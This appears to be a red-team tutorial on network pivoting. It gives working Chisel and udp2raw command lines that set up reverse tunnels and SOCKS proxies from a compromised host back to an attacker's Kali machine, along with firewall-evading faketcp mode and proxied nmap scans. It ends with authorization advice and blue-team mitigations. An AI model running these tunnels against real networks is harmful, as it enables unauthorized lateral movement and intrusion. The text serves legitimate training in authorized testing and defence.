Page cover image

Pivoting for Red Teaming

Techniques, Tools, and Best Practices

Introduction

With the increasing complexity of network infrastructures and the sophistication of cyber attacks, it's essential for companies to be prepared to identify and remediate vulnerabilities in their systems. It is in this context that the practice of red teaming comes into play.

Red teaming challenges an organization's defenses by simulating realistic attacks and providing an in-depth assessment of the security posture. One of the strategies used by the red team is pivoting. This technique allows analysts to expand their access and explore different machines within the network.

In this article, we will showcase the types of pivoting, tools, and recommendations.

1. What is Pivoting?

Pivoting is a technique that enables an attacker to progress from an initially compromised point to others within the target network, seeking to extend their control and explore different areas of the infrastructure.

The goal is to overcome security barriers such as firewalls, network segmentation, and access restrictions, in order to explore internal networks with more freedom. By moving through the network using pivoting, a red teamer can identify new vulnerabilities, explore important assets, and even obtain sensitive information.

Imagine the following scenario: we are on machine A and only have access to machine B in a corporate network. However, machine B has an additional network interface connecting it to other machines on the network (C and D). Initially, we don't have direct access to these other machines, but using the pivoting technique, we can create a tunnel that passes through machine B, allowing us to access machines C and D.

In this case, pivoting becomes essential to expand our presence and explore the resources of other networks. By using appropriate tools and techniques, we can establish a secure and concealed connection through machine B, using it as an intermediary point to access machines on other networks.

This example illustrates how pivoting can be a valuable strategy for red teamers, enabling them to advance through a network and access additional systems that would otherwise be out of their reach.

In the next stage, we will explore different types of pivoting, along with the tools and techniques used to perform this operation.

2. Types of Pivoting

Next, we will delve into three of the most common types of pivoting: Port Forwarding, Proxy Tunneling, and Double Pivoting.

2.1 Port Forwarding

Port forwarding is a type of pivoting that involves redirecting traffic from a specific port of a compromised machine to another machine on the target network. This technique allows the red teamer to access services or resources available on a target machine, even if they are originally inaccessible externally.

For instance, suppose the red teamer has compromised machine B on the target network and wants to access a web application on machine C, which is protected by a firewall. By using port forwarding, the red teamer can set up redirection from a port on machine B to the corresponding port on machine C. This way, it becomes possible to access the web application, bypassing the firewall protections.

2.2 Proxy Tunneling

Proxy tunneling is a pivoting method that allows the red teamer to establish a secure connection through a proxy or intermediary server to access systems or resources on the target network. This technique is particularly useful when there's a firewall or network segmentation that blocks direct access to internal systems.

For example, the red teamer can set up a proxy on the compromised system B and redirect traffic through it. From this proxy, the red teamer can establish a connection to machines on the target network, such as machine C or D, and explore their infrastructure.

2.3 Double Pivoting

Double pivoting involves using two intermediary machines to reach additional systems on the target network. In this technique, the red teamer establishes a chaining of pivoting, where each compromised machine is used as an intermediate point to access the next machine in the network.

For example, the red teamer can compromise machine B in the target network and, from there, establish a tunnel to machine X in network C. Double pivoting enables a stepped progression through the environment, expanding control and exploring different areas of the target network.

3. Tools and Pivoting Techniques

There are various tools and techniques available to assist in conducting pivoting during cybersecurity red teaming activities. For example:

  • Chisel

  • Udp2Raw

  • Fraud Bridge

  • SSF

  • Egress-Assess

  • Ligolo-ng

  • Sshuttle

  • Rpivot

  • Tunna

  • reGeorg/neo-Georg

  • PivotSuite

  • And many others

We will explore the first two here: Chisel and UDP2Raw. For information about the other tools, please visit my page: https://johnermac.gitbook.io

3.1 Chisel

Chisel is a tool for TCP/UDP tunneling, transported over HTTP, and secured through SSH. By utilizing Chisel, a red teamer can deploy a Chisel server on a compromised intermediary machine within the target network. They can then establish a secure connection to this server from an external machine, allowing the creation of an encrypted tunnel between the two machines. This tunnel enables secure and discreet access to additional systems on the target network.

Chisel is a comprehensive tool that offers options like Local Port Forwarding, Remote Port Forwarding, and the use of SOCKS proxy for dynamic interface access, forwarding all traffic from the target machine to our machine.

3.1.1 Considerations

Pros:

  • Easy to use

  • No need for an SSH server on the target

  • Encrypted communication

  • Dynamic destination port opening

  • No need to know the target machine's password

Cons:

  • Requires opening a port on the target machine

  • Requires sending the chisel client file to the target machine

3.1.2 Usage Mode

Local Port Forwarding
Target: chisel server -p 9999 --host <IP-Target> -v
Kali:   chisel client -v <IP-Target:9999> 127.0.0.1:8080:<IP-Kali>:80

In this way, we can access the target's port 80:
Kali:   Curl 127.0.0.1:8080
Reverse Remote Port Forwarding

Kali:   chisel server -p 9999 --host <IP-Kali> --reverse -v
Target: chisel client -v <IP-Kali:9999> R:127.0.0.1:8080:<IP-Target>:80

In this way, we can access the target's port 80:
Kali:   curl 127.0.0.1:8080

We can use the SOCKS proxy in both methods; upon applying it, we achieve the redirection of all traffic, not just from a single port.

Reverse Remote Port Fowarding utilizando Proxy SOCKS

Kali:   chisel server -p 9999 --host <IP-Kali> --reverse -v
Target: chisel client -v <IP-Kali:9999> R:127.0.0.1:8080:127.0.0.1:5555
Target: chisel server -p 8181 -–host 127.0.0.1 –socks5 -v
Target: chisel client -v 127.0.0.1:8181 127.0.0.1:5555:socks

Configure SOCKS5 in the /etc/proxychains.conf file on Kali to be able to use proxychains.

Add the following line to the configuration file:

socks5 127.0.0.1 1080

Now you can access the target through the created tunnel:

On Kali, run the following command:

proxychains -q nmap <IP-Target> -p 21,22,80 -sT -Pn

This command will use proxychains to perform an nmap scan on the specified target IP, scanning ports 21, 22, and 80 using a TCP connect scan and disabling host discovery.

3.1.3 Demonstration

Here is a video demonstrating how Chisel works:

3.2 Udp2Raw

With UDP2Raw, we can encapsulate UDP traffic into TCP packets and send them through an established connection to a compromised intermediary machine within the target network. This technique allows us to bypass firewall restrictions and forward UDP traffic to access additional systems on the target network.

When used standalone, udp2raw only tunnels UDP traffic. However, if you use udp2raw in conjunction with any UDP-based VPN, it's possible to tunnel any type of traffic (including TCP/UDP/ICMP). Currently, OpenVPN, L2TP, ShadowVPN, and tinyfecVPN are confirmed as supported.

By using ICMP/FakeTCP headers, we can bypass firewall blocks for UDP protocols, UDP QoS, or certain improper NAT behaviors. We can also utilize the UDP header. In this way, udp2raw functions as a UDP tunnel with additional options such as encryption (AES-128-CBC), anti-replay mechanisms, or connection stabilization. This enables more flexible and secure communication while overcoming various network restrictions and challenges.

3.2.1 Considerations

Pros:

  • Easy to use

  • Server can handle multiple clients

  • Offers header encapsulation method to bypass firewalls and increase detection difficulty

  • Tunnel closure secured with password

Cons:

  • Requires opening a port on the target machine

  • Requires sending the udp2raw file to the target machine

  • Has a limitation on file size when performing data exfiltration

3.2.2 Usage Mode

Target:

./udp2raw_amd64 -s -l <IP-Target>:4000 -r 127.0.0.1:12345 -k "senha" --raw-mode faketcp -a

Kali:

./udp2raw_amd64 -c -l <IP-Target>:3000 -r <IP-Kali>:4000 -k "senha" --raw-mode faketcp -a

In the example, we simulate access to a UDP service on port 12345 of the Target. After tunneling, we can access it as follows:

On Kali, use the following command to access the service:

nc -u 127.0.0.1 3000

These commands set up the tunnel using udp2raw, allowing communication between the Kali machine and the target machine's UDP service.

3.2.3 Demonstration

Here is a video demonstrating how Udp2Raw works:

4. Best Practices and Recommendations

4.1 For Red Team

Authorization: Ensure you obtain written authorization and adhere to company policies, guidelines, and regulations before conducting any activities that might go beyond the scope of the pentest. It's crucial to respect legality and ensure that all actions are performed within established boundaries.

Confidentiality: Maintain confidentiality of sensitive information discovered during pivoting activities. Respect the privacy of systems and data, refraining from accessing, modifying, or disclosing irrelevant information that doesn't align with red teaming objectives.

Cleanup: After completing pivoting activities, ensure proper cleanup of any traces left on compromised systems. Restore original settings, remove used tools and files, and reverse any changes made during the process.

Responsible Tool Use: Utilize tools and techniques responsibly and with a full understanding of their functionalities. Avoid the misuse of techniques that could cause harm or disruptions to systems.

Documentation: Record all pivoting activities in detail and accuracy. Document the steps taken, systems accessed, techniques employed, and relevant findings. Prepare clear and concise reports to communicate security results and recommendations.

4.2 For Blue Team

Implement Data Loss Prevention (DLP): DLP can detect and block unauthorized transfer of sensitive data.

Network Traffic Filtering: Implement proxies and dedicated servers for services like DNS, allowing only specific systems to communicate via designated ports/protocols, rather than allowing all network systems to communicate. Cloud service providers support IP-based restrictions when accessing cloud resources.

Implement NIDS/NIPS: Intrusion Detection and Prevention Systems (NIDS/NIPS) that use network signatures to identify traffic related to specific adversary command and control infrastructure, as well as malware, can mitigate network-level activities.

Network Segmentation: Follow network firewall best practices, allowing only necessary ports and traffic to enter and exit the network.

File and Directory Permission Restriction: Use Access Control Lists (ACLs) on cloud storage systems and objects.

User Account Management: Configure permission groups and user roles for cloud storage access. Implement robust Identity and Access Management (IAM) controls to prevent access to storage solutions except for applications, users, and services that genuinely require access. Issue temporary access tokens rather than permanent credentials, especially for entities outside internal security boundaries.

5. References

PreviousArticles

Last updated